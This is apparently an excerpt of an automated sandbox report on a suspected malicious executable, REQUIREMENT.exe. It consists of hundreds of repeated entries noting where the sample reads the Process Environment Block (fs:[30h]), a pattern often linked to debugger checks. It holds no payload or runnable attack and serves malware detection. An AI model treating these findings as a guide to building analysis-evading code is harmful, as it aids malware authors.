Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FF03 mov eax, dword ptr fs:[00000030h]	3_2_1EA0FF03
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98FF30 mov edi, dword ptr fs:[00000030h]	3_2_1E98FF30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADF36 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADF36
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADF36 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADF36
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADF36 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADF36
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADF36 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADF36
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98BF70 mov eax, dword ptr fs:[00000030h]	3_2_1E98BF70
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991F70 mov eax, dword ptr fs:[00000030h]	3_2_1E991F70
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4BF4D mov eax, dword ptr fs:[00000030h]	3_2_1EA4BF4D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E997C95 mov eax, dword ptr fs:[00000030h]	3_2_1E997C95
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E997C95 mov eax, dword ptr fs:[00000030h]	3_2_1E997C95
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987C85 mov eax, dword ptr fs:[00000030h]	3_2_1E987C85
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987C85 mov eax, dword ptr fs:[00000030h]	3_2_1E987C85
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987C85 mov eax, dword ptr fs:[00000030h]	3_2_1E987C85
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987C85 mov eax, dword ptr fs:[00000030h]	3_2_1E987C85
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987C85 mov eax, dword ptr fs:[00000030h]	3_2_1E987C85
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA13C80 mov ecx, dword ptr fs:[00000030h]	3_2_1EA13C80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4FC95 mov eax, dword ptr fs:[00000030h]	3_2_1EA4FC95
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA39C98 mov ecx, dword ptr fs:[00000030h]	3_2_1EA39C98
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA39C98 mov eax, dword ptr fs:[00000030h]	3_2_1EA39C98
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA39C98 mov eax, dword ptr fs:[00000030h]	3_2_1EA39C98
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA39C98 mov eax, dword ptr fs:[00000030h]	3_2_1EA39C98
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA27CE8 mov eax, dword ptr fs:[00000030h]	3_2_1EA27CE8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADCD1 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADCD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADCD1 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADCD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADCD1 mov eax, dword ptr fs:[00000030h]	3_2_1E9ADCD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99FCC9 mov eax, dword ptr fs:[00000030h]	3_2_1E99FCC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C9CCF mov eax, dword ptr fs:[00000030h]	3_2_1E9C9CCF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987CF1 mov eax, dword ptr fs:[00000030h]	3_2_1E987CF1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993CF0 mov eax, dword ptr fs:[00000030h]	3_2_1E993CF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993CF0 mov eax, dword ptr fs:[00000030h]	3_2_1E993CF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA15CD0 mov eax, dword ptr fs:[00000030h]	3_2_1EA15CD0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23CD4 mov eax, dword ptr fs:[00000030h]	3_2_1EA23CD4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23CD4 mov eax, dword ptr fs:[00000030h]	3_2_1EA23CD4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23CD4 mov ecx, dword ptr fs:[00000030h]	3_2_1EA23CD4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23CD4 mov eax, dword ptr fs:[00000030h]	3_2_1EA23CD4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23CD4 mov eax, dword ptr fs:[00000030h]	3_2_1EA23CD4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA27C38 mov eax, dword ptr fs:[00000030h]	3_2_1EA27C38
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA55C38 mov eax, dword ptr fs:[00000030h]	3_2_1EA55C38
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA55C38 mov ecx, dword ptr fs:[00000030h]	3_2_1EA55C38
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C20 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98DC40 mov eax, dword ptr fs:[00000030h]	3_2_1E98DC40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C40 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBC6E mov eax, dword ptr fs:[00000030h]	3_2_1E9CBC6E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBC6E mov eax, dword ptr fs:[00000030h]	3_2_1E9CBC6E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA13C57 mov eax, dword ptr fs:[00000030h]	3_2_1EA13C57
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98DDB0 mov eax, dword ptr fs:[00000030h]	3_2_1E98DDB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E997DB6 mov eax, dword ptr fs:[00000030h]	3_2_1E997DB6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99BDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E99BDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFDE0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BFDE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4BD08 mov eax, dword ptr fs:[00000030h]	3_2_1EA4BD08
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4BD08 mov eax, dword ptr fs:[00000030h]	3_2_1EA4BD08
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98FD20 mov eax, dword ptr fs:[00000030h]	3_2_1E98FD20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA15D60 mov eax, dword ptr fs:[00000030h]	3_2_1EA15D60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA65D65 mov eax, dword ptr fs:[00000030h]	3_2_1EA65D65
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991D50 mov eax, dword ptr fs:[00000030h]	3_2_1E991D50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991D50 mov eax, dword ptr fs:[00000030h]	3_2_1E991D50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADD4D mov eax, dword ptr fs:[00000030h]	3_2_1E9ADD4D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADD4D mov eax, dword ptr fs:[00000030h]	3_2_1E9ADD4D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ADD4D mov eax, dword ptr fs:[00000030h]	3_2_1E9ADD4D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E989D46 mov eax, dword ptr fs:[00000030h]	3_2_1E989D46
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E989D46 mov eax, dword ptr fs:[00000030h]	3_2_1E989D46
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E989D46 mov ecx, dword ptr fs:[00000030h]	3_2_1E989D46
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA55D43 mov eax, dword ptr fs:[00000030h]	3_2_1EA55D43
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA55D43 mov eax, dword ptr fs:[00000030h]	3_2_1EA55D43
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBD71 mov eax, dword ptr fs:[00000030h]	3_2_1E9CBD71
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBD71 mov eax, dword ptr fs:[00000030h]	3_2_1E9CBD71
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A5D60 mov eax, dword ptr fs:[00000030h]	3_2_1E9A5D60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11D5E mov eax, dword ptr fs:[00000030h]	3_2_1EA11D5E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4DAAF mov eax, dword ptr fs:[00000030h]	3_2_1EA4DAAF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98BA80 mov eax, dword ptr fs:[00000030h]	3_2_1E98BA80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA37ABE mov eax, dword ptr fs:[00000030h]	3_2_1EA37ABE
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C9ABF mov eax, dword ptr fs:[00000030h]	3_2_1E9C9ABF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C9ABF mov eax, dword ptr fs:[00000030h]	3_2_1E9C9ABF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C9ABF mov eax, dword ptr fs:[00000030h]	3_2_1E9C9ABF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDAC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDAC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDAC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDAC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDAC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDAC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDAC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDAC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDAC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDAC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDAC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDAC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3AF6 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3AF6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3AF6 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3AF6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3AF6 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3AF6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3AF6 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3AF6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3AF6 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3AF6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98FAEC mov edi, dword ptr fs:[00000030h]	3_2_1E98FAEC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E999AE4 mov eax, dword ptr fs:[00000030h]	3_2_1E999AE4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1DA31 mov eax, dword ptr fs:[00000030h]	3_2_1EA1DA31
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4DA30 mov eax, dword ptr fs:[00000030h]	3_2_1EA4DA30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987A30 mov eax, dword ptr fs:[00000030h]	3_2_1E987A30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987A30 mov eax, dword ptr fs:[00000030h]	3_2_1E987A30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987A30 mov eax, dword ptr fs:[00000030h]	3_2_1E987A30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDA20 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDA20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDA20 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDA20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDA20 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDA20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDA20 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDA20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDA20 mov eax, dword ptr fs:[00000030h]	3_2_1E9BDA20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BDA20 mov edx, dword ptr fs:[00000030h]	3_2_1E9BDA20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991A24 mov eax, dword ptr fs:[00000030h]	3_2_1E991A24
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991A24 mov eax, dword ptr fs:[00000030h]	3_2_1E991A24
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5BA66 mov eax, dword ptr fs:[00000030h]	3_2_1EA5BA66
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5BA66 mov eax, dword ptr fs:[00000030h]	3_2_1EA5BA66
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5BA66 mov eax, dword ptr fs:[00000030h]	3_2_1EA5BA66
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5BA66 mov eax, dword ptr fs:[00000030h]	3_2_1EA5BA66
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C9A48 mov eax, dword ptr fs:[00000030h]	3_2_1E9C9A48
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C9A48 mov eax, dword ptr fs:[00000030h]	3_2_1E9C9A48
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98FA44 mov ecx, dword ptr fs:[00000030h]	3_2_1E98FA44
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1DA40 mov eax, dword ptr fs:[00000030h]	3_2_1EA1DA40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C1B9C mov eax, dword ptr fs:[00000030h]	3_2_1E9C1B9C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1B80 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1B80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1DB90 mov eax, dword ptr fs:[00000030h]	3_2_1EA1DB90
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11B93 mov eax, dword ptr fs:[00000030h]	3_2_1EA11B93
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993BA4 mov eax, dword ptr fs:[00000030h]	3_2_1E993BA4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993BA4 mov eax, dword ptr fs:[00000030h]	3_2_1E993BA4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993BA4 mov eax, dword ptr fs:[00000030h]	3_2_1E993BA4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993BA4 mov eax, dword ptr fs:[00000030h]	3_2_1E993BA4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFBC0 mov ecx, dword ptr fs:[00000030h]	3_2_1E9BFBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BFBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BFBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BFBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BFBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9CBBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9CBBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBBC0 mov ecx, dword ptr fs:[00000030h]	3_2_1E9CBBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBBC0 mov eax, dword ptr fs:[00000030h]	3_2_1E9CBBC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FBC2 mov eax, dword ptr fs:[00000030h]	3_2_1EA0FBC2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25BC0 mov eax, dword ptr fs:[00000030h]	3_2_1EA25BC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987BF0 mov eax, dword ptr fs:[00000030h]	3_2_1E987BF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987BF0 mov ecx, dword ptr fs:[00000030h]	3_2_1E987BF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987BF0 mov eax, dword ptr fs:[00000030h]	3_2_1E987BF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987BF0 mov eax, dword ptr fs:[00000030h]	3_2_1E987BF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5BE0 mov eax, dword ptr fs:[00000030h]	3_2_1E9C5BE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5BE0 mov eax, dword ptr fs:[00000030h]	3_2_1E9C5BE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1BE7 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1BE7
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1BE7 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1BE7
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1DB2A mov eax, dword ptr fs:[00000030h]	3_2_1EA1DB2A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1B0F mov eax, dword ptr fs:[00000030h]	3_2_1E9D1B0F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1B0F mov eax, dword ptr fs:[00000030h]	3_2_1E9D1B0F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1DB1B mov eax, dword ptr fs:[00000030h]	3_2_1EA1DB1B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBB5B mov esi, dword ptr fs:[00000030h]	3_2_1E9CBB5B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1FB45 mov eax, dword ptr fs:[00000030h]	3_2_1EA1FB45
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4BB40 mov ecx, dword ptr fs:[00000030h]	3_2_1EA4BB40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4BB40 mov eax, dword ptr fs:[00000030h]	3_2_1EA4BB40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987B7D mov eax, dword ptr fs:[00000030h]	3_2_1E987B7D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987B7D mov ecx, dword ptr fs:[00000030h]	3_2_1E987B7D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD898 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD898
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CB890 mov eax, dword ptr fs:[00000030h]	3_2_1E9CB890
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CB890 mov eax, dword ptr fs:[00000030h]	3_2_1E9CB890
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CB890 mov eax, dword ptr fs:[00000030h]	3_2_1E9CB890
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C188E mov eax, dword ptr fs:[00000030h]	3_2_1E9C188E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C188E mov eax, dword ptr fs:[00000030h]	3_2_1E9C188E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA198B2 mov eax, dword ptr fs:[00000030h]	3_2_1EA198B2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B7882 mov eax, dword ptr fs:[00000030h]	3_2_1E9B7882
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
